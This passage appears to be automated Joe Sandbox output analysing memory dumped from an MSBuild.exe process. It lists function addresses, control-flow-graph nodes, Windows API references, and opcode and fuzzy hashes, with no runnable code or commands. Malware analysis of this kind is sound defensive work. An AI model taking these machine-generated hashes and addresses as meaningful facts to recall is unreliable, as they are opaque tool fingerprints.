                              control_flow_graph 184 4e66a50-4e66a70 185 4e66a77-4e66af4 184->185 186 4e66a72 184->186 188 4e66af6-4e66afe 185->188 189 4e66b00 185->189 186->185 190 4e66b07-4e66b9f LdrInitializeThunk 188->190 189->190 195 4e66ba1-4e66bdc 190->195 196 4e66bdd-4e66bf4 190->196 195->196 198 4e66bf6-4e66bf7 196->198 199 4e66bf9-4e66c01 196->199 201 4e66c02-4e66c06 198->201 199->201 203 4e66c0b-4e66c13 201->203 204 4e66c08-4e66c09 201->204 206 4e66c14-4e66c30 203->206 204->206 209 4e66c32-4e66c3a 206->209 210 4e66c3f-4e66c82 LdrInitializeThunk 206->210 211 4e66d7a-4e66d82 209->211 213 4e66c89-4e66cd5 210->213 216 4e66cd7-4e66d12 213->216 217 4e66d13-4e66d2a 213->217 216->217 220 4e66d2f-4e66d37 217->220 221 4e66d2c-4e66d2d 217->221 222 4e66d38-4e66d3c 220->222 221->222 223 4e66d41-4e66d49 222->223 224 4e66d3e-4e66d3f 222->224 227 4e66d4a-4e66d66 223->227 224->227 230 4e66d72-4e66d78 227->230 231 4e66d68-4e66d70 227->231 230->211 231->211
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 30f748a467be9dd83729ffd8f164ea66285d805422f0fb52f2ffac757851a5e1
                              • Instruction ID: 5d70adccbd7d0df0ed5f61dbe24f7523c6a1bda9a9cdb7d23e603a0ab38ab954
                              • Opcode Fuzzy Hash: 30f748a467be9dd83729ffd8f164ea66285d805422f0fb52f2ffac757851a5e1
                              • Instruction Fuzzy Hash: 90B19F74E41218CFDB14DFAAC884ADDBBF6BF89304F149069D40AAB355DB746985CF10
                              Function 04E6AA60 Relevance: 1.8, APIs: 1, Instructions: 277libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1198 4e6aa60-4e6aa98 1199 4e6aa9f-4e6ab46 1198->1199 1200 4e6aa9a 1198->1200 1204 4e6ab4d-4e6ab5b 1199->1204 1205 4e6ab48 1199->1205 1200->1199 1206 4e6ab62-4e6ae45 1204->1206 1207 4e6ab5d 1204->1207 1205->1204 1209 4e6ab7a-4e6ab83 1206->1209 1210 4e6ae4b-4e6ae5c 1206->1210 1207->1206 1213 4e6ab85 1209->1213 1214 4e6ab8a-4e6abd3 LdrInitializeThunk 1209->1214 1211 4e6ae67-4e6aeb2 1210->1211 1212 4e6ae5e-4e6ae65 1210->1212 1215 4e6aeb4-4e6aebd 1211->1215 1212->1215 1213->1214 1218 4e6abda-4e6ac0d 1214->1218 1222 4e6ac0f-4e6ad9e 1218->1222 1223 4e6ac29-4e6ac6f 1218->1223 1226 4e6ada0-4e6ada9 1222->1226 1227 4e6adaa 1222->1227 1231 4e6ad38-4e6ad41 1223->1231 1226->1227 1228 4e6adab 1227->1228 1228->1228 1232 4e6ad47-4e6ad6b 1231->1232 1233 4e6ac74-4e6ac7d 1231->1233 1237 4e6ad77 1232->1237 1238 4e6ad6d-4e6ad76 1232->1238 1235 4e6ac84-4e6acd9 1233->1235 1236 4e6ac7f 1233->1236 1243 4e6ad0a-4e6ad25 1235->1243 1244 4e6acdb-4e6ad09 1235->1244 1236->1235 1240 4e6ad78 1237->1240 1238->1237 1240->1240 1247 4e6ad27-4e6ad30 1243->1247 1248 4e6ad31 1243->1248 1244->1243 1247->1248 1248->1231
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 673f8115a0cc2a034a33cbadfb15aee4557487f7c79c309ed5e5063fd1141f57
                              • Instruction ID: efcaadfcb2c76c1e3635177ce35e9d375b89453f35ade9865221269706c11b3f
                              • Opcode Fuzzy Hash: 673f8115a0cc2a034a33cbadfb15aee4557487f7c79c309ed5e5063fd1141f57
                              • Instruction Fuzzy Hash: CEC1E174E00218CFDB18DFA9C984B9DFBB2BF8A304F249169D409BB255DB34A985CF54
                              Function 04E62098 Relevance: 1.7, APIs: 1, Instructions: 173libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1251 4e62098-4e620b2 1252 4e620b4 1251->1252 1253 4e620b9-4e6211e 1251->1253 1252->1253 1255 4e62125-4e62133 1253->1255 1256 4e62120 1253->1256 1257 4e62135 1255->1257 1258 4e6213a-4e6214d 1255->1258 1256->1255 1257->1258 1259 4e62305-4e6230e 1258->1259 1260 4e62314-4e62325 1259->1260 1261 4e62152-4e6215b 1259->1261 1262 4e62327-4e6232e 1260->1262 1263 4e62339-4e62366 1260->1263 1264 4e62162-4e621bf LdrInitializeThunk 1261->1264 1265 4e6215d 1261->1265 1266 4e6237a-4e62382 1262->1266 1271 4e62372-4e62378 1263->1271 1272 4e62368-4e62370 1263->1272 1273 4e621c6-4e6222a 1264->1273 1265->1264 1271->1266 1272->1266 1278 4e62236 1273->1278 1279 4e6222c-4e62235 1273->1279 1278->1259 1279->1278
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 4f041f836063b6aa2fb6b4a5b2910c9290069ceab0d32d964a9710d298f70a8a
                              • Instruction ID: 247d504566a878ede2098a899ce5df34bf63e8b4d3399746c021b29f584aa768
                              • Opcode Fuzzy Hash: 4f041f836063b6aa2fb6b4a5b2910c9290069ceab0d32d964a9710d298f70a8a
                              • Instruction Fuzzy Hash: 1471CF74E04218CFDB18DFAAD584A9EFBF2BF89300F24D169D509AB255DB34A842CF54
                              Function 05B3EAE8 Relevance: 1.7, Strings: 1, Instructions: 422COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1281 5b3eae8-5b3eb11 1282 5b3eb13 1281->1282 1283 5b3eb16-5b3eb46 1281->1283 1282->1283 1286 5b3eba3-5b3ebb2 1283->1286 1287 5b3eb48-5b3eb57 1283->1287 1290 5b3ebb4-5b3ebc9 call 5b3aa70 1286->1290 1291 5b3ebcb-5b3ebde call 5b3aa70 1286->1291 1292 5b3eb59-5b3eb69 1287->1292 1293 5b3eb8c-5b3eba1 call 5b3aa70 1287->1293 1301 5b3ebe0-5b3ec1e 1290->1301 1291->1301 1292->1293 1296 5b3eb6b-5b3eb8a 1292->1296 1293->1301 1296->1286 1296->1293 1305 5b3ec20-5b3ec28 1301->1305 1306 5b3ec2a-5b3ec30 1301->1306 1307 5b3ec33-5b3ec35 1305->1307 1306->1307 1308 5b3ec37-5b3ec3c 1307->1308 1309 5b3ec3e-5b3ec63 1307->1309 1310 5b3ec7a-5b3ec7c 1308->1310 1328 5b3ec77 1309->1328 1329 5b3ec65-5b3ec75 1309->1329 1312 5b3ecc4-5b3eccb 1310->1312 1313 5b3ec7e-5b3ec82 1310->1313 1314 5b3ef43-5b3ef74 1312->1314 1315 5b3ecd1-5b3ecdb call 5b362a0 1312->1315 1313->1312 1316 5b3ec84-5b3ecad 1313->1316 1337 5b3ef80-5b3ef87 1314->1337 1338 5b3ef76-5b3ef78 1314->1338 1323 5b3ed51-5b3ed58 1315->1323 1324 5b3ecdd-5b3ece1 1315->1324 1325 5b3ecb9-5b3ecbf 1316->1325 1326 5b3ecaf-5b3ecb1 1316->1326 1332 5b3ede6-5b3edef 1323->1332 1333 5b3ed5e-5b3ed70 1323->1333 1330 5b3ece3-5b3ecfa 1324->1330 1331 5b3ecff-5b3ed4c 1324->1331 1327 5b3f003-5b3f00a 1325->1327 1326->1325 1328->1310 1329->1310 1330->1327 1331->1314 1335 5b3edf1-5b3edf7 1332->1335 1336 5b3edfa-5b3ee40 1332->1336 1333->1332 1348 5b3ed72-5b3ed76 1333->1348 1335->1336 1336->1314 1383 5b3ee46-5b3ee4a 1336->1383 1343 5b3ef89-5b3ef8d 1337->1343 1344 5b3ef8f-5b3ef95 1337->1344 1338->1337 1345 5b3ef9f-5b3efa3 1343->1345 1344->1345 1346 5b3ef97-5b3ef99 1344->1346 1351 5b3efa5-5b3efae 1345->1351 1352 5b3efc8-5b3efd2 call 5b362a0 1345->1352 1346->1345 1350 5b3ef9b 1346->1350 1354 5b3ed94-5b3ede1 1348->1354 1355 5b3ed78-5b3ed8f 1348->1355 1350->1345 1356 5b3efb0-5b3efb6 1351->1356 1357 5b3efb8-5b3efbf 1351->1357 1367 5b3eff4-5b3eff8 1352->1367 1368 5b3efd4-5b3efeb 1352->1368 1354->1314 1355->1327 1363 5b3efc2-5b3efc3 call 5b3b278 1356->1363 1357->1363 1363->1352 1370 5b3f001 1367->1370 1371 5b3effa 1367->1371 1368->1367 1380 5b3efed 1368->1380 1370->1327 1371->1370 1380->1367 1384 5b3ee68-5b3ee6b 1383->1384 1385 5b3ee4c-5b3ee63 1383->1385 1386 5b3ee71-5b3eef4 1384->1386 1387 5b3eef6-5b3ef38 1384->1387 1385->1327 1386->1314 1387->1314
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: 2d414db6e9f98d5f2b822ff90eac692761ad767b4b7dd0036c69850317474d79
                              • Instruction ID: 0d375472707d0932e25c66e31318b112e78f72332ae74227b97adc0cd53b7865
                              • Opcode Fuzzy Hash: 2d414db6e9f98d5f2b822ff90eac692761ad767b4b7dd0036c69850317474d79
                              • Instruction Fuzzy Hash: D7024D71A00205DFDB29DF74C495AAE7BB6FF89304F1484A9E406AB391DB35ED42CB90
                              Function 04E66A40 Relevance: 1.7, APIs: 1, Instructions: 154libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1467 4e66a40-4e66a70 1469 4e66a77-4e66af4 1467->1469 1470 4e66a72 1467->1470 1472 4e66af6-4e66afe 1469->1472 1473 4e66b00 1469->1473 1470->1469 1474 4e66b07-4e66b9f LdrInitializeThunk 1472->1474 1473->1474 1479 4e66ba1-4e66bdc 1474->1479 1480 4e66bdd-4e66bf4 1474->1480 1479->1480 1482 4e66bf6-4e66bf7 1480->1482 1483 4e66bf9-4e66c01 1480->1483 1485 4e66c02-4e66c06 1482->1485 1483->1485 1487 4e66c0b-4e66c13 1485->1487 1488 4e66c08-4e66c09 1485->1488 1490 4e66c14-4e66c30 1487->1490 1488->1490 1493 4e66c32-4e66c3a 1490->1493 1494 4e66c3f-4e66c82 LdrInitializeThunk 1490->1494 1495 4e66d7a-4e66d82 1493->1495 1497 4e66c89-4e66cd5 1494->1497 1500 4e66cd7-4e66d12 1497->1500 1501 4e66d13-4e66d2a 1497->1501 1500->1501 1504 4e66d2f-4e66d37 1501->1504 1505 4e66d2c-4e66d2d 1501->1505 1506 4e66d38-4e66d3c 1504->1506 1505->1506 1507 4e66d41-4e66d49 1506->1507 1508 4e66d3e-4e66d3f 1506->1508 1511 4e66d4a-4e66d66 1507->1511 1508->1511 1514 4e66d72-4e66d78 1511->1514 1515 4e66d68-4e66d70 1511->1515 1514->1495 1515->1495
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: b6996f32075dd5dcc3ce127e2cfa654103eebf8eacf6a17267489d38fea5c441
                              • Instruction ID: 23d639a2b9f32d09cc5d96f8a66c3842dae783412bca9acd6e6f3067e8229a42
                              • Opcode Fuzzy Hash: b6996f32075dd5dcc3ce127e2cfa654103eebf8eacf6a17267489d38fea5c441
                              • Instruction Fuzzy Hash: 5161BEB5E01318CFDB18DFAAC84469DBBF6BF89304F14906AD409AB355EB346945CF00
                              Function 0261D0A8 Relevance: 1.6, APIs: 1, Instructions: 112nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,?,?), ref: 0261D173
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: Memory64ReadVirtualWow64
                              • String ID:
                              • API String ID: 3357887247-0
                              • Opcode ID: 7b23ea04a3256c1c835d716bb73ea4d15b27a1355aa8e717242112204199886a
                              • Instruction ID: b822ce8970c2acc937775e8eeea73cfadc480e26219601c458833426c99aa018
                              • Opcode Fuzzy Hash: 7b23ea04a3256c1c835d716bb73ea4d15b27a1355aa8e717242112204199886a
                              • Instruction Fuzzy Hash: 864178B9D002489FDF00CFA9D980A9EFBB1BB09310F24902AE818BB310D335A945CF54
                              Function 0261B738 Relevance: 1.6, APIs: 1, Instructions: 111nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,?,?), ref: 0261D173
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: Memory64ReadVirtualWow64
                              • String ID:
                              • API String ID: 3357887247-0
                              • Opcode ID: 4ab8ea5ac218b71a5e5a8bf8eef2512aeaa442d38549b870732d1353ae4e0ba2
                              • Instruction ID: fc5b71bfefaa5ddb1a7da141e975786815e3f9db5cb720c9500690cb79f5c7e1
                              • Opcode Fuzzy Hash: 4ab8ea5ac218b71a5e5a8bf8eef2512aeaa442d38549b870732d1353ae4e0ba2
                              • Instruction Fuzzy Hash: DB4168B9D042589FDF10CFA9D984A9EFBB1FB49310F24902AE918BB310D375A945CF64
                              Function 0261D238 Relevance: 1.6, APIs: 1, Instructions: 107libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 61f83170ea813a3e7f13872f7191e535b2801ae639d8d0bebb93c051b4eea031
                              • Instruction ID: d394f6441ec57840394b048bad789b8981b7e24ff5330d7c798c81183122284e
                              • Opcode Fuzzy Hash: 61f83170ea813a3e7f13872f7191e535b2801ae639d8d0bebb93c051b4eea031
                              • Instruction Fuzzy Hash: 8941B074E01218DFDB18DFA9D484A9EBBF2BF8A300F24912AD815BB364DB346841CF54
                              Function 0261B72C Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWow64QueryInformationProcess64.NTDLL(?,?,?,?,?), ref: 0261CE54
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: InformationProcess64QueryWow64
                              • String ID:
                              • API String ID: 1933981353-0
                              • Opcode ID: 2523a7c2a5ff478209d001039abca6a7efcca5e5f53a95c2c5df2367e582db7d
                              • Instruction ID: 3e382f59793a50239fcbde9abadc6d2fb97424fb6c9db5687b48c341429bffc1
                              • Opcode Fuzzy Hash: 2523a7c2a5ff478209d001039abca6a7efcca5e5f53a95c2c5df2367e582db7d
                              • Instruction Fuzzy Hash: 584167B9D052589FCF00CFA9D984A9EFBF1BB09310F14906AE918B7310D375A945CF69
                              Function 0261CD99 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWow64QueryInformationProcess64.NTDLL(?,?,?,?,?), ref: 0261CE54
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: InformationProcess64QueryWow64
                              • String ID:
                              • API String ID: 1933981353-0
                              • Opcode ID: 9b1ac4e0d13aea1a6637fe6f37777951a4fe26295004f6e1ecb7c68ad1950860
                              • Instruction ID: 0f4d2952e5ff3c7b336567dadc5c9f0f9bf0c6b3b03b189b6be85317d3c24280
                              • Opcode Fuzzy Hash: 9b1ac4e0d13aea1a6637fe6f37777951a4fe26295004f6e1ecb7c68ad1950860
                              • Instruction Fuzzy Hash: 4D4156B9D012589FCB00CFA9D984ADEFBB1BB09310F14906AE818B7310D375A945CF65
                              Function 05B85238 Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: 4
                              • API String ID: 0-4088798008
                              • Opcode ID: dac8855d4cf3a1dbb3683b23327dc167f98d53553392cd6a0d6b6fbcbe4f4752
                              • Instruction ID: 4115ea2c4720aefb8f4040305093046889d697db7edb0010c3799b4c05028372
                              • Opcode Fuzzy Hash: dac8855d4cf3a1dbb3683b23327dc167f98d53553392cd6a0d6b6fbcbe4f4752
                              • Instruction Fuzzy Hash: 51B1DFB5E01258DFDB14CFA9D880AEEBBB2FF88301F24916AD415AB294D774A941CF50
                              Function 0261B2B8 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: K'
                              • API String ID: 0-1387706169
                              • Opcode ID: 0598866f6ff7c4e3aa58be3cb5b613d70d58770e81b4adc70446c0304d92bcf1
                              • Instruction ID: c5367f6cf53cd4d840215826b6bdaa71a8f22249822d4fcb659d73b61d96ffe9
                              • Opcode Fuzzy Hash: 0598866f6ff7c4e3aa58be3cb5b613d70d58770e81b4adc70446c0304d92bcf1
                              • Instruction Fuzzy Hash: BEB1D274E00218CFDB14DFA9D880AADBBF2FF89304F5485A9D409AB355DB35A982CF50
                              Function 05B8A4D0 Relevance: 1.0, Instructions: 1049COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 655414bd864fefe33e196b293f708dbf0d853e19841fead23cfb17f998873fd2
                              • Instruction ID: bb592df9f1f5ec97c36a917882f1e0b962bc89ff466fca88c0a415a95d67f16c
                              • Opcode Fuzzy Hash: 655414bd864fefe33e196b293f708dbf0d853e19841fead23cfb17f998873fd2
                              • Instruction Fuzzy Hash: 77B29C74A012298FDB64DF68C984BEDFBB2BF48311F1492D9D448A7256D730AE81CF94
                              Function 04E6CDD8 Relevance: .8, Instructions: 814COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4420e5ba7cea1da23d52e096b960975cecc6e53d1fda186696cc6f2d02b78134
                              • Instruction ID: bffba03e6cb3af1d6d0ae082f9c30dd4d99606c4e39db180ab7c963828ae877b
                              • Opcode Fuzzy Hash: 4420e5ba7cea1da23d52e096b960975cecc6e53d1fda186696cc6f2d02b78134
                              • Instruction Fuzzy Hash: 81829E75784255CFDB64CF24D888B697BF5BF88308F1080A8D40A9B799DB34E984DFA0
                              Function 04E6B470 Relevance: .8, Instructions: 811COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7ac8da98994e3540cb9665f06c4e227587c45f9b52033efb12b65dcffd8337be
                              • Instruction ID: 00e648167a7603d4850376279cb2e08220b550bd588d7d03081b390f5a384b89
                              • Opcode Fuzzy Hash: 7ac8da98994e3540cb9665f06c4e227587c45f9b52033efb12b65dcffd8337be
                              • Instruction Fuzzy Hash: C2724770E00229CFDB28DF65C8547ADFBB2BF89304F1495A9D40ABB251DB74AA85CF50
                              Function 0261BE80 Relevance: .7, Instructions: 718COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: InformationProcess64QueryWow64
                              • String ID:
                              • API String ID: 1933981353-0
                              • Opcode ID: 5baab172941b216e0410bdc8c3610ef0e86a0f19c58e1ce907b71f308a36e1af
                              • Instruction ID: 5ace11e8aa9b1a9f960a1795be7153a997551a1c722b40485494a3cf89925221
                              • Opcode Fuzzy Hash: 5baab172941b216e0410bdc8c3610ef0e86a0f19c58e1ce907b71f308a36e1af
                              • Instruction Fuzzy Hash: 5572CD759012289FDB66CF65CD44BEDBBB6BF89300F0481EAD509A7261DB31AE81DF40
                              Function 05B86020 Relevance: .7, Instructions: 709COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d5d569c959312ebebb9bc4512a91da6f6da6faa854e569cf8d528225be11f311
                              • Instruction ID: b0eaf501a9b9736455598f26299b68d475ab067bec89eb18fd5964bf7cb8838a
                              • Opcode Fuzzy Hash: d5d569c959312ebebb9bc4512a91da6f6da6faa854e569cf8d528225be11f311
                              • Instruction Fuzzy Hash: 0172AF74D05229CFDB64DF29C984BEDBBB2BB89300F1091E9D409AB251DB35AE85CF50
                              Function 05B87428 Relevance: .6, Instructions: 625COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 30670615a6a868fb1f66723c1ce6423319f6bb43a7d70fa0a676a48ac8891e13
                              • Instruction ID: 56163c3f43daa644f68d21645f4c81b1e4b2af9b2b94ecf3d0fd403ebda72558
                              • Opcode Fuzzy Hash: 30670615a6a868fb1f66723c1ce6423319f6bb43a7d70fa0a676a48ac8891e13
                              • Instruction Fuzzy Hash: 186292B4E052198FDB24DF69C984BEDFBB2FF48304F2481A9D409A7255DB31AA81CF54
                              Function 05B3E160 Relevance: .6, Instructions: 601COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8e1916c4274d111e46ef1adacee2f064cc989877b45d98e989fc0ac01600a665
                              • Instruction ID: f8aff0cfdce0789b100b949ce1e18d15b87c53432a362585e4c8c0cd6fbbf5ee
                              • Opcode Fuzzy Hash: 8e1916c4274d111e46ef1adacee2f064cc989877b45d98e989fc0ac01600a665
                              • Instruction Fuzzy Hash: 1B323A34B002058FDB15DF69C589A6EBBF6FF88300F1584AAE506AB3A1DB71ED41CB50
                              Function 02619662 Relevance: .5, Instructions: 544COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b8dc3321535e5c454c07a2ab7c95bf5aa624f37f0ce77acb7040b8dc2a93db6d
                              • Instruction ID: e7cd62e509d14c5f0743c9be68c40cf6fc6ab8feb1cfd8354a8cdb27b9518d86
                              • Opcode Fuzzy Hash: b8dc3321535e5c454c07a2ab7c95bf5aa624f37f0ce77acb7040b8dc2a93db6d
                              • Instruction Fuzzy Hash: 2942BD74D06228CFDB69DF65C854BEDBBB2BB49300F1481EAD449A7250DB31AE85CF50
                              Function 04E609A0 Relevance: .5, Instructions: 542COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a6b574fe8169b4e2706873d1d0aa80dd81cdda89685af2a01ce99dc86053d0ab
                              • Instruction ID: d663c256dd0fa13dc913683ee98f3a9a8c38e21eb8ee1c6a05b028d55c0deda0
                              • Opcode Fuzzy Hash: a6b574fe8169b4e2706873d1d0aa80dd81cdda89685af2a01ce99dc86053d0ab
                              • Instruction Fuzzy Hash: 1742C0B4E01228CFDB29CFA5D984BDDBBB2BF48304F1081AAD409A7254D735AA81DF50
                              Function 04E660E0 Relevance: .5, Instructions: 482COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 89e4da68e21d7d42f34f29e6c5d87d101738ed04b33724099f0984d476579fa2
                              • Instruction ID: 25b6e036c6f7e1061b0a146f8313f691e6a82b3bb7f584b42f88f2bed53b6f4f
                              • Opcode Fuzzy Hash: 89e4da68e21d7d42f34f29e6c5d87d101738ed04b33724099f0984d476579fa2
                              • Instruction Fuzzy Hash: AE32D075D41228CFDB28DF69C944BEDBBB2BB89301F1094E9C509A7250DB34AE85DF50
                              Function 05B3B498 Relevance: .5, Instructions: 471COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: af84e2c9891c9cb1a0df1f048509eecc146bb8f1b2c5da9683b717aa7f26a005
                              • Instruction ID: 812bea1dd8c21f58891720c9ec657f41c55405f219e1c84d274e364faadf2547
                              • Opcode Fuzzy Hash: af84e2c9891c9cb1a0df1f048509eecc146bb8f1b2c5da9683b717aa7f26a005
                              • Instruction Fuzzy Hash: 9D220570A00219DFDB29DF64C485AADBBB2FF49301F5480A9E809AB365DB31ED85CF51
                              Function 04E61818 Relevance: .4, Instructions: 420COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
